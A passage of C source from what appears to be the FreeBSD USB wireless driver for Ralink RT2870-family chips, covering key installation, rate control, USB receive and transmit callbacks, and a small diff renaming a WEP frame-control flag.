wmesp->wme_params[WME_AC_VO].wmep_logcwmin << 12 | wmesp->wme_params[WME_AC_VI].wmep_logcwmin << 8 | wmesp->wme_params[WME_AC_BK].wmep_logcwmin << 4 | wmesp->wme_params[WME_AC_BE].wmep_logcwmin); if (error) goto err; error = run_write(sc, RT2860_WMM_CWMAX_CFG, wmesp->wme_params[WME_AC_VO].wmep_logcwmax << 12 | wmesp->wme_params[WME_AC_VI].wmep_logcwmax << 8 | wmesp->wme_params[WME_AC_BK].wmep_logcwmax << 4 | wmesp->wme_params[WME_AC_BE].wmep_logcwmax); if (error) goto err; error = run_write(sc, RT2860_WMM_TXOP0_CFG, wmesp->wme_params[WME_AC_BK].wmep_txopLimit << 16 | wmesp->wme_params[WME_AC_BE].wmep_txopLimit); if (error) goto err; error = run_write(sc, RT2860_WMM_TXOP1_CFG, wmesp->wme_params[WME_AC_VO].wmep_txopLimit << 16 | wmesp->wme_params[WME_AC_VI].wmep_txopLimit); err: if (error) DPRINTF("WME update failed\n"); return; } static int run_wme_update(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; /* sometime called wothout lock */ if (mtx_owned(&ic->ic_comlock.mtx)) { uint32_t i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_wme_update_cb; sc->cmdq[i].arg0 = ic; ieee80211_runtask(ic, &sc->cmdq_task); return (0); } RUN_LOCK(sc); run_wme_update_cb(ic); RUN_UNLOCK(sc); /* return whatever, upper layer desn't care anyway */ return (0); } static void run_key_update_begin(struct ieee80211vap *vap) { /* * To avoid out-of-order events, both run_key_set() and * _delete() are deferred and handled by run_cmdq_cb(). * So, there is nothing we need to do here. */ } static void run_key_update_end(struct ieee80211vap *vap) { /* null */ } static void run_key_set_cb(void *arg) { struct run_cmdq *cmdq = arg; struct ieee80211vap *vap = cmdq->arg1; struct ieee80211_key *k = cmdq->k; struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; uint32_t attr; uint16_t base, associd; uint8_t mode, wcid, iv[8]; RUN_LOCK_ASSERT(sc, MA_OWNED); if (vap->iv_opmode == IEEE80211_M_HOSTAP) ni = ieee80211_find_vap_node(&ic->ic_sta, vap, cmdq->mac); else ni = vap->iv_bss; associd = (ni != NULL) ? ni->ni_associd : 0; /* map net80211 cipher to RT2860 security mode */ switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: if(k->wk_keylen < 8) mode = RT2860_MODE_WEP40; else mode = RT2860_MODE_WEP104; break; case IEEE80211_CIPHER_TKIP: mode = RT2860_MODE_TKIP; break; case IEEE80211_CIPHER_AES_CCM: mode = RT2860_MODE_AES_CCMP; break; default: DPRINTF("undefined case\n"); return; } DPRINTFN(1, "associd=%x, keyix=%d, mode=%x, type=%s, tx=%s, rx=%s\n", associd, k->wk_keyix, mode, (k->wk_flags & IEEE80211_KEY_GROUP) ? "group" : "pairwise", (k->wk_flags & IEEE80211_KEY_XMIT) ? "on" : "off", (k->wk_flags & IEEE80211_KEY_RECV) ? "on" : "off"); if (k->wk_flags & IEEE80211_KEY_GROUP) { wcid = 0; /* NB: update WCID0 for group keys */ base = RT2860_SKEY(RUN_VAP(vap)->rvp_id, k->wk_keyix); } else { wcid = (vap->iv_opmode == IEEE80211_M_STA) ? 1 : RUN_AID2WCID(associd); base = RT2860_PKEY(wcid); } if (k->wk_cipher->ic_cipher == IEEE80211_CIPHER_TKIP) { if(run_write_region_1(sc, base, k->wk_key, 16)) return; if(run_write_region_1(sc, base + 16, &k->wk_key[16], 8)) /* wk_txmic */ return; if(run_write_region_1(sc, base + 24, &k->wk_key[24], 8)) /* wk_rxmic */ return; } else { /* roundup len to 16-bit: XXX fix write_region_1() instead */ if(run_write_region_1(sc, base, k->wk_key, (k->wk_keylen + 1) & ~1)) return; } if (!(k->wk_flags & IEEE80211_KEY_GROUP) || (k->wk_flags & (IEEE80211_KEY_XMIT | IEEE80211_KEY_RECV))) { /* set initial packet number in IV+EIV */ if (k->wk_cipher == IEEE80211_CIPHER_WEP) { memset(iv, 0, sizeof iv); iv[3] = vap->iv_def_txkey << 6; } else { if (k->wk_cipher->ic_cipher == IEEE80211_CIPHER_TKIP) { iv[0] = k->wk_keytsc >> 8; iv[1] = (iv[0] | 0x20) & 0x7f; iv[2] = k->wk_keytsc; } else /* CCMP */ { iv[0] = k->wk_keytsc; iv[1] = k->wk_keytsc >> 8; iv[2] = 0; } iv[3] = k->wk_keyix << 6 | IEEE80211_WEP_EXTIV; iv[4] = k->wk_keytsc >> 16; iv[5] = k->wk_keytsc >> 24; iv[6] = k->wk_keytsc >> 32; iv[7] = k->wk_keytsc >> 40; } if (run_write_region_1(sc, RT2860_IVEIV(wcid), iv, 8)) return; } if (k->wk_flags & IEEE80211_KEY_GROUP) { /* install group key */ if (run_read(sc, RT2860_SKEY_MODE_0_7, &attr)) return; attr &= ~(0xf << (k->wk_keyix * 4)); attr |= mode << (k->wk_keyix * 4); if (run_write(sc, RT2860_SKEY_MODE_0_7, attr)) return; } else { /* install pairwise key */ if (run_read(sc, RT2860_WCID_ATTR(wcid), &attr)) return; attr = (attr & ~0xf) | (mode << 1) | RT2860_RX_PKEY_EN; if (run_write(sc, RT2860_WCID_ATTR(wcid), attr)) return; } /* TODO create a pass-thru key entry? */ /* need wcid to delete the right key later */ k->wk_pad = wcid; } /* * Don't have to be deferred, but in order to keep order of * execution, i.e. with run_key_delete(), defer this and let * run_cmdq_cb() maintain the order. * * return 0 on error */ static int run_key_set(struct ieee80211vap *vap, struct ieee80211_key *k, const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t i; i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_key_set_cb; sc->cmdq[i].arg0 = NULL; sc->cmdq[i].arg1 = vap; sc->cmdq[i].k = k; IEEE80211_ADDR_COPY(sc->cmdq[i].mac, mac); ieee80211_runtask(ic, &sc->cmdq_task); /* * To make sure key will be set when hostapd * calls iv_key_set() before if_init(). */ if (vap->iv_opmode == IEEE80211_M_HOSTAP) { RUN_LOCK(sc); sc->cmdq_key_set = RUN_CMDQ_GO; RUN_UNLOCK(sc); } return (1); } /* * If wlan is destroyed without being brought down i.e. without * wlan down or wpa_cli terminate, this function is called after * vap is gone. Don't refer it. */ static void run_key_delete_cb(void *arg) { struct run_cmdq *cmdq = arg; struct run_softc *sc = cmdq->arg1; struct ieee80211_key *k = &cmdq->key; uint32_t attr; uint8_t wcid; RUN_LOCK_ASSERT(sc, MA_OWNED); if (k->wk_flags & IEEE80211_KEY_GROUP) { /* remove group key */ DPRINTF("removing group key\n"); run_read(sc, RT2860_SKEY_MODE_0_7, &attr); attr &= ~(0xf << (k->wk_keyix * 4)); run_write(sc, RT2860_SKEY_MODE_0_7, attr); } else { /* remove pairwise key */ DPRINTF("removing key for wcid %x\n", k->wk_pad); /* matching wcid was written to wk_pad in run_key_set() */ wcid = k->wk_pad; run_read(sc, RT2860_WCID_ATTR(wcid), &attr); attr &= ~0xf; run_write(sc, RT2860_WCID_ATTR(wcid), attr); run_set_region_4(sc, RT2860_WCID_ENTRY(wcid), 0, 8); } k->wk_pad = 0; } /* * return 0 on error */ static int run_key_delete(struct ieee80211vap *vap, struct ieee80211_key *k) { struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_key *k0; uint32_t i; /* * When called back, key might be gone. So, make a copy * of some values need to delete keys before deferring. * But, because of LOR with node lock, cannot use lock here. * So, use atomic instead. */ i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_key_delete_cb; sc->cmdq[i].arg0 = NULL; sc->cmdq[i].arg1 = sc; k0 = &sc->cmdq[i].key; k0->wk_flags = k->wk_flags; k0->wk_keyix = k->wk_keyix; /* matching wcid was written to wk_pad in run_key_set() */ k0->wk_pad = k->wk_pad; ieee80211_runtask(ic, &sc->cmdq_task); return (1); /* return fake success */ } static void run_ratectl_to(void *arg) { struct run_softc *sc = arg; /* do it in a process context, so it can go sleep */ ieee80211_runtask(sc->sc_ifp->if_l2com, &sc->ratectl_task); /* next timeout will be rescheduled in the callback task */ } /* ARGSUSED */ static void run_ratectl_cb(void *arg, int pending) { struct run_softc *sc = arg; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (vap == NULL) return; if (sc->rvp_cnt <= 1 && vap->iv_opmode == IEEE80211_M_STA) run_iter_func(sc, vap->iv_bss); else { /* * run_reset_livelock() doesn't do anything with AMRR, * but Ralink wants us to call it every 1 sec. So, we * piggyback here rather than creating another callout. * Livelock may occur only in HOSTAP or IBSS mode * (when h/w is sending beacons). */ RUN_LOCK(sc); run_reset_livelock(sc); /* just in case, there are some stats to drain */ run_drain_fifo(sc); RUN_UNLOCK(sc); ieee80211_iterate_nodes(&ic->ic_sta, run_iter_func, sc); } RUN_LOCK(sc); if(sc->ratectl_run != RUN_RATECTL_OFF) usb_callout_reset(&sc->ratectl_ch, hz, run_ratectl_to, sc); RUN_UNLOCK(sc); } static void run_drain_fifo(void *arg) { struct run_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t stat; uint16_t (*wstat)[3]; uint8_t wcid, mcs, pid; int8_t retry; RUN_LOCK_ASSERT(sc, MA_OWNED); for (;;) { /* drain Tx status FIFO (maxsize = 16) */ run_read(sc, RT2860_TX_STAT_FIFO, &stat); DPRINTFN(4, "tx stat 0x%08x\n", stat); if (!(stat & RT2860_TXQ_VLD)) break; wcid = (stat >> RT2860_TXQ_WCID_SHIFT) & 0xff; /* if no ACK was requested, no feedback is available */ if (!(stat & RT2860_TXQ_ACKREQ) || wcid > RT2870_WCID_MAX || wcid == 0) continue; /* * Even though each stat is Tx-complete-status like format, * the device can poll stats. Because there is no guarantee * that the referring node is still around when read the stats. * So that, if we use ieee80211_ratectl_tx_update(), we will * have hard time not to refer already freed node. * * To eliminate such page faults, we poll stats in softc. * Then, update the rates later with ieee80211_ratectl_tx_update(). */ wstat = &(sc->wcid_stats[wcid]); (*wstat)[RUN_TXCNT]++; if (stat & RT2860_TXQ_OK) (*wstat)[RUN_SUCCESS]++; else ifp->if_oerrors++; /* * Check if there were retries, ie if the Tx success rate is * different from the requested rate. Note that it works only * because we do not allow rate fallback from OFDM to CCK. */ mcs = (stat >> RT2860_TXQ_MCS_SHIFT) & 0x7f; pid = (stat >> RT2860_TXQ_PID_SHIFT) & 0xf; if ((retry = pid -1 - mcs) > 0) { (*wstat)[RUN_TXCNT] += retry; (*wstat)[RUN_RETRY] += retry; } } DPRINTFN(3, "count=%d\n", sc->fifo_cnt); sc->fifo_cnt = 0; } static void run_iter_func(void *arg, struct ieee80211_node *ni) { struct run_softc *sc = arg; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct run_node *rn = (void *)ni; union run_stats sta[2]; uint16_t (*wstat)[3]; int txcnt, success, retrycnt, error; RUN_LOCK(sc); if (sc->rvp_cnt <= 1 && (vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_STA)) { /* read statistic counters (clear on read) and update AMRR state */ error = run_read_region_1(sc, RT2860_TX_STA_CNT0, (uint8_t *)sta, sizeof sta); if (error != 0) goto fail; /* count failed TX as errors */ ifp->if_oerrors += le16toh(sta[0].error.fail); retrycnt = le16toh(sta[1].tx.retry); success = le16toh(sta[1].tx.success); txcnt = retrycnt + success + le16toh(sta[0].error.fail); DPRINTFN(3, "retrycnt=%d success=%d failcnt=%d\n", retrycnt, success, le16toh(sta[0].error.fail)); } else { wstat = &(sc->wcid_stats[RUN_AID2WCID(ni->ni_associd)]); if (wstat == &(sc->wcid_stats[0]) || wstat > &(sc->wcid_stats[RT2870_WCID_MAX])) goto fail; txcnt = (*wstat)[RUN_TXCNT]; success = (*wstat)[RUN_SUCCESS]; retrycnt = (*wstat)[RUN_RETRY]; DPRINTFN(3, "retrycnt=%d txcnt=%d success=%d\n", retrycnt, txcnt, success); memset(wstat, 0, sizeof(*wstat)); } ieee80211_ratectl_tx_update(vap, ni, &txcnt, &success, &retrycnt); rn->amrr_ridx = ieee80211_ratectl_rate(ni, NULL, 0); fail: RUN_UNLOCK(sc); DPRINTFN(3, "ridx=%d\n", rn->amrr_ridx); } static void run_newassoc_cb(void *arg) { struct run_cmdq *cmdq = arg; struct ieee80211_node *ni = cmdq->arg1; struct run_softc *sc = ni->ni_vap->iv_ic->ic_ifp->if_softc; uint8_t wcid = cmdq->wcid; RUN_LOCK_ASSERT(sc, MA_OWNED); run_write_region_1(sc, RT2860_WCID_ENTRY(wcid), ni->ni_macaddr, IEEE80211_ADDR_LEN); memset(&(sc->wcid_stats[wcid]), 0, sizeof(sc->wcid_stats[wcid])); } static void run_newassoc(struct ieee80211_node *ni, int isnew) { struct run_node *rn = (void *)ni; struct ieee80211_rateset *rs = &ni->ni_rates; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; uint8_t rate; uint8_t ridx; uint8_t wcid; int i, j; wcid = (vap->iv_opmode == IEEE80211_M_STA) ? 1 : RUN_AID2WCID(ni->ni_associd); if (wcid > RT2870_WCID_MAX) { device_printf(sc->sc_dev, "wcid=%d out of range\n", wcid); return; } /* only interested in true associations */ if (isnew && ni->ni_associd != 0) { /* * This function could is called though timeout function. * Need to defer. */ uint32_t cnt = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", cnt); sc->cmdq[cnt].func = run_newassoc_cb; sc->cmdq[cnt].arg0 = NULL; sc->cmdq[cnt].arg1 = ni; sc->cmdq[cnt].wcid = wcid; ieee80211_runtask(ic, &sc->cmdq_task); } DPRINTF("new assoc isnew=%d associd=%x addr=%s\n", isnew, ni->ni_associd, ether_sprintf(ni->ni_macaddr)); for (i = 0; i < rs->rs_nrates; i++) { rate = rs->rs_rates[i] & IEEE80211_RATE_VAL; /* convert 802.11 rate to hardware rate index */ for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; rn->ridx[i] = ridx; /* determine rate of control response frames */ for (j = i; j >= 0; j--) { if ((rs->rs_rates[j] & IEEE80211_RATE_BASIC) && rt2860_rates[rn->ridx[i]].phy == rt2860_rates[rn->ridx[j]].phy) break; } if (j >= 0) { rn->ctl_ridx[i] = rn->ridx[j]; } else { /* no basic rate found, use mandatory one */ rn->ctl_ridx[i] = rt2860_rates[ridx].ctl_ridx; } DPRINTF("rate=0x%02x ridx=%d ctl_ridx=%d\n", rs->rs_rates[i], rn->ridx[i], rn->ctl_ridx[i]); } rate = vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)].mgmtrate; for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; rn->mgt_ridx = ridx; DPRINTF("rate=%d, mgmt_ridx=%d\n", rate, rn->mgt_ridx); usb_callout_reset(&sc->ratectl_ch, hz, run_ratectl_to, sc); } /* * Return the Rx chain with the highest RSSI for a given frame. */ static __inline uint8_t run_maxrssi_chain(struct run_softc *sc, const struct rt2860_rxwi *rxwi) { uint8_t rxchain = 0; if (sc->nrxchains > 1) { if (rxwi->rssi[1] > rxwi->rssi[rxchain]) rxchain = 1; if (sc->nrxchains > 2) if (rxwi->rssi[2] > rxwi->rssi[rxchain]) rxchain = 2; } return (rxchain); } static void run_rx_frame(struct run_softc *sc, struct mbuf *m, uint32_t dmalen) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct rt2870_rxd *rxd; struct rt2860_rxwi *rxwi; uint32_t flags; uint16_t len, rxwisize; uint8_t ant, rssi; int8_t nf; rxwi = mtod(m, struct rt2860_rxwi *); len = le16toh(rxwi->len) & 0xfff; rxwisize = sizeof(struct rt2860_rxwi); if (sc->mac_ver == 0x5592) rxwisize += sizeof(uint64_t); else if (sc->mac_ver == 0x3593) rxwisize += sizeof(uint32_t); if (__predict_false(len > dmalen)) { m_freem(m); ifp->if_ierrors++; DPRINTF("bad RXWI length %u > %u\n", len, dmalen); return; } /* Rx descriptor is located at the end */ rxd = (struct rt2870_rxd *)(mtod(m, caddr_t) + dmalen); flags = le32toh(rxd->flags); if (__predict_false(flags & (RT2860_RX_CRCERR | RT2860_RX_ICVERR))) { m_freem(m); ifp->if_ierrors++; DPRINTF("%s error.\n", (flags & RT2860_RX_CRCERR)?"CRC":"ICV"); return; } m->m_data += rxwisize; m->m_pkthdr.len = m->m_len -= rxwisize; wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; m->m_flags |= M_WEP; } if (flags & RT2860_RX_L2PAD) { DPRINTFN(8, "received RT2860_RX_L2PAD frame\n"); len += 2; } ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (__predict_false(flags & RT2860_RX_MICERR)) { /* report MIC failures to net80211 for TKIP */ if (ni != NULL) ieee80211_notify_michael_failure(ni->ni_vap, wh, rxwi->keyidx); m_freem(m); ifp->if_ierrors++; DPRINTF("MIC error. Someone is lying.\n"); return; } ant = run_maxrssi_chain(sc, rxwi); rssi = rxwi->rssi[ant]; nf = run_rssi2dbm(sc, rssi, ant); m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = len; if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else { (void)ieee80211_input_all(ic, m, rssi, nf); } if (__predict_false(ieee80211_radiotap_active(ic))) { struct run_rx_radiotap_header *tap = &sc->sc_rxtap; uint16_t phy; tap->wr_flags = 0; tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); tap->wr_antsignal = rssi; tap->wr_antenna = ant; tap->wr_dbm_antsignal = run_rssi2dbm(sc, rssi, ant); tap->wr_rate = 2; /* in case it can't be found below */ phy = le16toh(rxwi->phy); switch (phy & RT2860_PHY_MODE) { case RT2860_PHY_CCK: switch ((phy & RT2860_PHY_MCS) & ~RT2860_PHY_SHPRE) { case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; } if (phy & RT2860_PHY_SHPRE) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; break; case RT2860_PHY_OFDM: switch (phy & RT2860_PHY_MCS) { case 0: tap->wr_rate = 12; break; case 1: tap->wr_rate = 18; break; case 2: tap->wr_rate = 24; break; case 3: tap->wr_rate = 36; break; case 4: tap->wr_rate = 48; break; case 5: tap->wr_rate = 72; break; case 6: tap->wr_rate = 96; break; case 7: tap->wr_rate = 108; break; } break; } } } static void run_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct run_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m = NULL; struct mbuf *m0; uint32_t dmalen; uint16_t rxwisize; int xferlen; rxwisize = sizeof(struct rt2860_rxwi); if (sc->mac_ver == 0x5592) rxwisize += sizeof(uint64_t); else if (sc->mac_ver == 0x3593) rxwisize += sizeof(uint32_t); usbd_xfer_status(xfer, &xferlen, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(15, "rx done, actlen=%d\n", xferlen); if (xferlen < (int)(sizeof(uint32_t) + rxwisize + sizeof(struct rt2870_rxd))) { DPRINTF("xfer too short %d\n", xferlen); goto tr_setup; } m = sc->rx_m; sc->rx_m = NULL; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: if (sc->rx_m == NULL) { sc->rx_m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE /* xfer can be bigger than MCLBYTES */); } if (sc->rx_m == NULL) { DPRINTF("could not allocate mbuf - idle with stall\n"); ifp->if_ierrors++; usbd_xfer_set_stall(xfer); usbd_xfer_set_frames(xfer, 0); } else { /* * Directly loading a mbuf cluster into DMA to * save some data copying. This works because * there is only one cluster. */ usbd_xfer_set_frame_data(xfer, 0, mtod(sc->rx_m, caddr_t), RUN_MAX_RXSZ); usbd_xfer_set_frames(xfer, 1); } usbd_transfer_submit(xfer); break; default: /* Error */ if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); ifp->if_ierrors++; goto tr_setup; } if (sc->rx_m != NULL) { m_freem(sc->rx_m); sc->rx_m = NULL; } break; } if (m == NULL) return; /* inputting all the frames must be last */ RUN_UNLOCK(sc); m->m_pkthdr.len = m->m_len = xferlen; /* HW can aggregate multiple 802.11 frames in a single USB xfer */ for(;;) { dmalen = le32toh(*mtod(m, uint32_t *)) & 0xffff; if ((dmalen >= (uint32_t)-8) || (dmalen == 0) || ((dmalen & 3) != 0)) { DPRINTF("bad DMA length %u\n", dmalen); break; } if ((dmalen + 8) > (uint32_t)xferlen) { DPRINTF("bad DMA length %u > %d\n", dmalen + 8, xferlen); break; } /* If it is the last one or a single frame, we won't copy. */ if ((xferlen -= dmalen + 8) <= 8) { /* trim 32-bit DMA-len header */ m->m_data += 4; m->m_pkthdr.len = m->m_len -= 4; run_rx_frame(sc, m, dmalen); m = NULL; /* don't free source buffer */ break; } /* copy aggregated frames to another mbuf */ m0 = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (__predict_false(m0 == NULL)) { DPRINTF("could not allocate mbuf\n"); ifp->if_ierrors++; break; } m_copydata(m, 4 /* skip 32-bit DMA-len header */, dmalen + sizeof(struct rt2870_rxd), mtod(m0, caddr_t)); m0->m_pkthdr.len = m0->m_len = dmalen + sizeof(struct rt2870_rxd); run_rx_frame(sc, m0, dmalen); /* update data ptr */ m->m_data += dmalen + 8; m->m_pkthdr.len = m->m_len -= dmalen + 8; } /* make sure we free the source buffer, if any */ m_freem(m); RUN_LOCK(sc); } static void run_tx_free(struct run_endpoint_queue *pq, struct run_tx_data *data, int txerr) { if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; if (data->ni == NULL) { DPRINTF("no node\n"); } else { ieee80211_free_node(data->ni); data->ni = NULL; } } STAILQ_INSERT_TAIL(&pq->tx_fh, data, next); pq->tx_nfree++; } static void run_bulk_tx_callbackN(struct usb_xfer *xfer, usb_error_t error, u_int index) { struct run_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct run_tx_data *data; struct ieee80211vap *vap = NULL; struct usb_page_cache *pc; struct run_endpoint_queue *pq = &sc->sc_epq[index]; struct mbuf *m; usb_frlength_t size; int actlen; int sumlen; usbd_xfer_status(xfer, &actlen, &sumlen, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(11, "transfer complete: %d " "bytes @ index %d\n", actlen, index); data = usbd_xfer_get_priv(xfer); run_tx_free(pq, data, 0); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&pq->tx_qh); if (data == NULL) break; STAILQ_REMOVE_HEAD(&pq->tx_qh, next); m = data->m; size = (sc->mac_ver == 0x5592) ? RUN_MAX_TXSZ + sizeof(uint32_t) : RUN_MAX_TXSZ; if ((m->m_pkthdr.len + sizeof(data->desc) + 3 + 8) > size) { DPRINTF("data overflow, %u bytes\n", m->m_pkthdr.len); ifp->if_oerrors++; run_tx_free(pq, data, 1); goto tr_setup; } pc = usbd_xfer_get_frame(xfer, 0); size = (sc->mac_ver == 0x5592) ? sizeof(data->desc) + sizeof(uint32_t) : sizeof(data->desc); usbd_copy_in(pc, 0, &data->desc, size); usbd_m_copy_in(pc, size, m, 0, m->m_pkthdr.len); size += m->m_pkthdr.len; /* * Align end on a 4-byte boundary, pad 8 bytes (CRC + * 4-byte padding), and be sure to zero those trailing * bytes: */ usbd_frame_zero(pc, size, ((-size) & 3) + 8); size += ((-size) & 3) + 8; vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct run_tx_radiotap_header *tap = &sc->sc_txtap; struct rt2860_txwi *txwi = (struct rt2860_txwi *)(&data->desc + sizeof(struct rt2870_txd)); tap->wt_flags = 0; tap->wt_rate = rt2860_rates[data->ridx].rate; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); tap->wt_hwqueue = index; if (le16toh(txwi->phy) & RT2860_PHY_SHPRE) tap->wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; ieee80211_radiotap_tx(vap, m); } DPRINTFN(11, "sending frame len=%u/%u @ index %d\n", m->m_pkthdr.len, size, index); usbd_xfer_set_frame_len(xfer, 0, size); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); RUN_UNLOCK(sc); run_start(ifp); RUN_LOCK(sc); break; default: DPRINTF("USB transfer error, %s\n", usbd_errstr(error)); data = usbd_xfer_get_priv(xfer); ifp->if_oerrors++; if (data != NULL) { if(data->ni != NULL) vap = data->ni->ni_vap; run_tx_free(pq, data, error); usbd_xfer_set_priv(xfer, NULL); } if (vap == NULL) vap = TAILQ_FIRST(&ic->ic_vaps); if (error != USB_ERR_CANCELLED) { if (error == USB_ERR_TIMEOUT) { device_printf(sc->sc_dev, "device timeout\n"); uint32_t i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_usb_timeout_cb; sc->cmdq[i].arg0 = vap; ieee80211_runtask(ic, &sc->cmdq_task); } /* * Try to clear stall first, also if other * errors occur, hence clearing stall * introduces a 50 ms delay: */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static void run_bulk_tx_callback0(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 0); } static void run_bulk_tx_callback1(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 1); } static void run_bulk_tx_callback2(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 2); } static void run_bulk_tx_callback3(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 3); } static void run_bulk_tx_callback4(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 4); } static void run_bulk_tx_callback5(struct usb_xfer *xfer, usb_error_t error) { run_bulk_tx_callbackN(xfer, error, 5); } static void run_set_tx_desc(struct run_softc *sc, struct run_tx_data *data) { struct mbuf *m = data->m; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = data->ni->ni_vap; struct ieee80211_frame *wh; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint16_t xferlen, txwisize; uint16_t mcs; uint8_t ridx = data->ridx; uint8_t pad; /* get MCS code from rate index */ mcs = rt2860_rates[ridx].mcs; txwisize = (sc->mac_ver == 0x5592) ? sizeof(*txwi) + sizeof(uint32_t) : sizeof(*txwi); xferlen = txwisize + m->m_pkthdr.len; /* roundup to 32-bit alignment */ xferlen = (xferlen + 3) & ~3; txd = (struct rt2870_txd *)&data->desc; txd->len = htole16(xferlen); wh = mtod(m, struct ieee80211_frame *); /* * Ether both are true or both are false, the header * are nicely aligned to 32-bit. So, no L2 padding. */ if(IEEE80211_HAS_ADDR4(wh) == IEEE80211_QOS_HAS_SEQ(wh)) pad = 0; else pad = 2; /* setup TX Wireless Information */ txwi = (struct rt2860_txwi *)(txd + 1); txwi->len = htole16(m->m_pkthdr.len - pad); if (rt2860_rates[ridx].phy == IEEE80211_T_DS) { txwi->phy = htole16(RT2860_PHY_CCK); if (ridx != RT2860_RIDX_CCK1 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) mcs |= RT2860_PHY_SHPRE; } else txwi->phy = htole16(RT2860_PHY_OFDM); txwi->phy |= htole16(mcs); /* check if RTS/CTS or CTS-to-self protection is required */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (m->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold || ((ic->ic_flags & IEEE80211_F_USEPROT) && rt2860_rates[ridx].phy == IEEE80211_T_OFDM))) txwi->txop |= RT2860_TX_TXOP_HT; else txwi->txop |= RT2860_TX_TXOP_BACKOFF; if (vap->iv_opmode != IEEE80211_M_STA && !IEEE80211_QOS_HAS_SEQ(wh)) txwi->xflags |= RT2860_TX_NSEQ; } /* This function must be called locked */ static int run_tx(struct run_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_frame *wh; struct ieee80211_channel *chan; const struct ieee80211_txparam *tp; struct run_node *rn = (void *)ni; struct run_tx_data *data; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint16_t qos; 